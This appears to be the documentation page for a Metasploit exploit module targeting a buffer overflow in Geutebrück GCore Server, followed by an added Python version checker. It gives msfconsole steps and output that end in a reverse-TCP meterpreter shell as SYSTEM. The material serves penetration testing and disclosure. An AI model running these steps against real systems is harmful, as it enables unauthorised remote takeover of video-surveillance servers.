## Vulnerable Application

  Geutebrück GCore Server versions 1.3.8.42 and 1.4.2.37 are vulnerable to a buffer overflow.
  Because the application runs with SYSTEM privileges, exploitation results in remote code execution as SYSTEM.

## Verification Steps

  1. Install Windows as the base OS (tested with Win2012R2 and Windows 7)
  2. Install the Geutebrück GCore server
  3. Verify that http://<your target ip>:13003/statistics/runningmoduleslist.xml is available.
  4. Start msfconsole
  5. Do: ```use exploit/windows/http/geutebrueck_gcore_x64_rce_bo```
  6. Do: ```set rhost <your target ip>```
  7. Do: ```set rport 13003```
  8. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
  9. Do: ```exploit```
  10. You should get a shell as NT AUTHORITY\SYSTEM.

## Scenarios

### Geutebrueck GCore 1.4.2.37

```
msf exploit(geutebrueck_gcore_x64_rce_bo) > show options

Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.10      yes       The target address
   RPORT    13003             yes       The target port



   Payload options (windows/x64/meterpreter/reverse_tcp):

      Name      Current Setting  Required  Description
      ----      ---------------  --------  -----------
      EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
      LHOST     192.168.1.11     yes       The listen address
      LPORT     4444             yes       The listen port


   Exploit target:

      Id  Name
      --  ----
      0   Automatic Targeting

msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit
    [*] Started reverse TCP handler on 192.168.1.11:4444
    [*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml...
    [*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)
    [*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37!
    [*] 192.168.1.10:13003 - Crafting Exploit...
    [*] 192.168.1.10:13003 - Exploit ready for sending...
    [*] 192.168.1.10:13003 - Exploit sent!
    [*] Sending stage (1188415 bytes) to
    [*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200
    [*] 192.168.1.10:13003 - Closing socket.
    meterpreter > getsystem
    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
    meterpreter > getuid
    Server username: NT-AUTORITÄT\SYSTEM
    meterpreter >
```

## Mitigation

Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities.
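
An added example, not part of the Metasploit module or any Geutebrück tooling: a Python check an administrator can run against their own GCore servers to see which ones still report one of the affected builds, before and after installing the update. It assumes the build number appears verbatim in the body of the statistics page from step 3; the function names and the sample body are constructed for illustration.

```python
import http.client
import re
import sys
import urllib.request

# Affected builds named on this page.
AFFECTED = {"1.3.8.42", "1.4.2.37"}
STATS_PATH = "/statistics/runningmoduleslist.xml"
# Four-part dotted build number such as 1.4.2.37 (assumption: present verbatim in the body).
# Note: an IPv4 address in the body has the same shape and is reported as "not-listed".
VERSION_RE = re.compile(r"(?<![\d.])(\d+\.\d+\.\d+\.\d+)(?![\d.])")


def classify(body):
    """Return (status, versions) for one statistics-page body."""
    found = sorted(set(VERSION_RE.findall(body)))
    hits = [v for v in found if v in AFFECTED]
    if hits:
        return "affected", hits      # still running a build listed above
    if found:
        return "not-listed", found   # some other build; compare with the vendor's fixed version
    return "no-version", []          # page served, but no build number recognised


def check_host(host, port=13003, timeout=5):
    """Fetch the statistics page from a server you administer and classify it."""
    url = f"http://{host}:{port}{STATS_PATH}"
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read(1_000_000).decode("utf-8", errors="replace")
    except (OSError, http.client.HTTPException) as exc:
        # Covers refused connections, timeouts, HTTP errors and malformed replies.
        return "unreachable", [str(exc)]
    return classify(body)


# Constructed sample body; the real XML layout is not shown on this page.
SAMPLE = '<modules><module name="GCore" version="1.4.2.37"/></modules>'

if __name__ == "__main__":
    for host in sys.argv[1:]:
        status, detail = check_host(host)
        print(f"{host}: {status} {', '.join(detail)}")
```

A host that moves from `affected` to `not-listed` after the update has changed build; confirm the new number against the vendor's release notes, since this check only knows the two affected versions.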
